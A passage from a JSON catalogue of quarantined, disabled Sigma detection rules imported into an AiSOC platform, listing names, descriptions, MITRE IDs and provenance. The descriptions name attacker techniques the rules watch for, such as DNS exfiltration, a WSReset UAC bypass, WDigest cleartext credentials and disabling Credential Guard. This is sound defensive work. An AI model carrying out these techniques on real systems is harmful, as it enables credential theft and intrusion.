"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobaltstrike-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml" } }, { "id": "sigmahq-sigma-d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "type": "detection", "name": "Files With System Process Name In Unsuspected Locations", "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).\nIt is highly recommended to perform an initial baseline before using this rule in production.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/files-with-system-process-name-in-unsuspected-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_creation_system_file.yml" } }, { "id": "sigmahq-sigma-d58ba5c6-0ed7-4b9d-a433-6878379efda9", "type": "detection", "name": "Remote Access Tool - AnyDesk Incoming Connection", "description": "Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-incoming-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d58ba5c6-0ed7-4b9d-a433-6878379efda9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_remote_access_tools_anydesk_incoming_connection.yml" } }, { "id": "sigmahq-sigma-d59d7842-9a21-4bc6-ba98-64bfe0091355", "type": "detection", "name": "Powershell DNSExfiltration", "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-dnsexfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" } }, { "id": "sigmahq-sigma-d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", "type": "detection", "name": "Sysprep on AppData Folder", "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysprep-on-appdata-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml" } }, { "id": "sigmahq-sigma-d635249d-86b5-4dad-a8c7-d7272b788586", "type": "detection", "name": "BITS Transfer Job Download From File Sharing Domains", "description": "Detects BITS transfer job downloading files from a file sharing domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bits-transfer-job-download-from-file-sharing-domains.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d635249d-86b5-4dad-a8c7-d7272b788586", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-d645ef86-2396-48a1-a2b6-b629ca3f57ff", "type": "detection", "name": "Windows Credential Guard Related Registry Value Deleted - Registry", "description": "Detects attempts to disable Windows Credential Guard by deleting registry values. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\nAdversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-credential-guard-related-registry-value-deleted-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d645ef86-2396-48a1-a2b6-b629ca3f57ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_disable_credential_guard.yml" } }, { "id": "sigmahq-sigma-d65aee4d-2292-4cea-b832-83accd6cfa43", "type": "detection", "name": "Arbitrary Binary Execution Using GUP Utility", "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-binary-execution-using-gup-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d65aee4d-2292-4cea-b832-83accd6cfa43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml" } }, { "id": "sigmahq-sigma-d65f37da-a26a-48f8-8159-3dde96680ad2", "type": "detection", "name": "Process Execution Error In JVM Based Application", "description": "Detects process execution related exceptions in JVM based apps, often relates to RCE", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-execution-error-in-jvm-based-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d65f37da-a26a-48f8-8159-3dde96680ad2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/jvm/java_rce_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "type": "detection", "name": "NetNTLM Downgrade Attack - Registry", "description": "Detects NetNTLM downgrade attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/netntlm-downgrade-attack-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" } }, { "id": "sigmahq-sigma-d679950c-abb7-43a6-80fb-2a480c4fc450", "type": "detection", "name": "PDQ Deploy Remote Adminstartion Tool Execution", "description": "Detect use of PDQ Deploy remote admin tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pdq-deploy-remote-adminstartion-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d679950c-abb7-43a6-80fb-2a480c4fc450", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pdqdeploy_execution.yml" } }, { "id": "sigmahq-sigma-d6a9b252-c666-4de6-8806-5561bbbd3bdc", "type": "detection", "name": "Wdigest Enable UseLogonCredential", "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wdigest-enable-uselogoncredential.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" } }, { "id": "sigmahq-sigma-d6b5520d-3934-48b4-928c-2aa3f92d6963", "type": "detection", "name": "Important Windows Service Terminated With Error", "description": "Detects important or interesting Windows services that got terminated for whatever reason", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-windows-service-terminated-with-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml" } }, { "id": "sigmahq-sigma-d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", "type": "detection", "name": "WinSock2 Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winsock2-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" } }, { "id": "sigmahq-sigma-d6ce7ebd-260b-4323-9768-a9631c8d4db2", "type": "detection", "name": "RestrictedAdminMode Registry Value Tampering", "description": "Detects changes to the \"DisableRestrictedAdmin\" registry value in order to disable or enable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/restrictedadminmode-registry-value-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml" } }, { "id": "sigmahq-sigma-d7329412-13bd-44ba-a072-3387f804a106", "type": "detection", "name": "Guest Account Enabled Via Sysadminctl", "description": "Detects attempts to enable the guest account using the sysadminctl utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1078.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/guest-account-enabled-via-sysadminctl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7329412-13bd-44ba-a072-3387f804a106", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" } }, { "id": "sigmahq-sigma-d7553d7b-f485-479c-b192-cdac6edd83a4", "type": "detection", "name": "OpenCanary - NMAP XMAS Scan", "description": "Detects instances where an OpenCanary node has been targeted by a NMAP XMAS Scan", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-nmap-xmas-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7553d7b-f485-479c-b192-cdac6edd83a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_portscan_nmap_xmas_scan.yml" } }, { "id": "sigmahq-sigma-d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "type": "detection", "name": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1132.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-frombase64string-usage-on-gzip-archive-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_frombase64string_archive.yml" } }, { "id": "sigmahq-sigma-d7654f02-e04b-4934-9838-65c46f187ebc", "type": "detection", "name": "PUA- IOX Tunneling Tool Execution", "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-iox-tunneling-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7654f02-e04b-4934-9838-65c46f187ebc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_iox.yml" } }, { "id": "sigmahq-sigma-d7662ff6-9e97-4596-a61d-9839e32dee8d", "type": "detection", "name": "Add SafeBoot Keys Via Reg Utility", "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-safeboot-keys-via-reg-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" } }, { "id": "sigmahq-sigma-d7821ff1-4527-4e33-9f84-d0d57fa2fb66", "type": "detection", "name": "Print History File Contents", "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/print-history-file-contents.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" } }, { "id": "sigmahq-sigma-d78b5d61-187d-44b6-bf02-93486a80de5a", "type": "detection", "name": "HackTool - DInjector PowerShell Cradle Execution", "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-dinjector-powershell-cradle-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d78b5d61-187d-44b6-bf02-93486a80de5a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_dinjector.yml" } }, { "id": "sigmahq-sigma-d797268e-28a9-49a7-b9a8-2f5039011c5c", "type": "detection", "name": "Bypass UAC via WSReset.exe", "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-via-wsreset-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" } }, { "id": "sigmahq-sigma-d7a63acb-1284-49bc-bfea-7771146c8b1c", "type": "detection", "name": "Potential Vcruntime140 DLL Sideloading", "description": "Detects potential DLL sideloading of vcruntime140.dll, a common C++ runtime library.\nThreat actors have been observed using DLL sideloading techniques to load malicious payloads under the guise of legitimate applications such as SqlWriter, SqlDumper etc.\nNotably, APT29 has been documented leveraging WinELOADER to sideload vcruntime140.dll for executing malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-vcruntime140-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7a63acb-1284-49bc-bfea-7771146c8b1c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vcruntime140.yml" } }, { "id": "sigmahq-sigma-d7a650c4-226c-451e-948f-cc490db506aa", "type": "detection", "name": "PUA - TruffleHog Execution - Linux", "description": "Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.\nWhile it is a legitimate tool, intended for use in CI pipelines and security assessments,\nIt was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-trufflehog-execution-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7a650c4-226c-451e-948f-cc490db506aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_pua_trufflehog.yml" } }, { "id": "sigmahq-sigma-d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "type": "detection", "name": "CobaltStrike Service Installations - Security", "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobaltstrike-service-installations-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" } }, { "id": "sigmahq-sigma-d7b50671-d1ad-4871-aa60-5aa5b331fe04", "type": "detection", "name": "Suspicious File Creation In Uncommon AppData Folder", "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-creation-in-uncommon-appdata-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" } }, { "id": "sigmahq-sigma-d7b81144-b866-48a4-9bcc-275dc69d870e", "type": "detection", "name": "Windows EventLog Autologger Session Registry Modification Via CommandLine", "description": "Detects attempts to disable Windows EventLog autologger sessions via registry modification.\nThe AutoLogger event tracing session records events that occur early in the operating system boot process.\nApplications and device drivers can use the AutoLogger session to capture traces before the user logs in.\nAdversaries may disable these sessions to evade detection and prevent security monitoring of early boot activities and system events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-eventlog-autologger-session-registry-modification-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7b81144-b866-48a4-9bcc-275dc69d870e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_autologger_session_registry_modification.yml" } }, { "id": "sigmahq-sigma-d7bcd677-645d-4691-a8d4-7a5602b780d1", "type": "detection", "name": "Potential PowerShell Command Line Obfuscation", "description": "Detects the PowerShell command lines with special characters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-command-line-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" } }, { "id": "sigmahq-sigma-d7c75059-2901-4578-b209-8837fd31c6a8", "type": "detection", "name": "Proxy Execution via Vshadow", "description": "Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits.\nVShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag,\nattackers can leverage this parameter to proxy the execution of malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/proxy-execution-via-vshadow.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d7c75059-2901-4578-b209-8837fd31c6a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vshadow_exec.yml" } }, { "id": "sigmahq-sigma-d7eab125-5f94-43df-8710-795b80fa1189", "type": "detection", "name": "Microsoft 365 - Impossible Travel Activity", "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", "version": "1.0.0", "author": 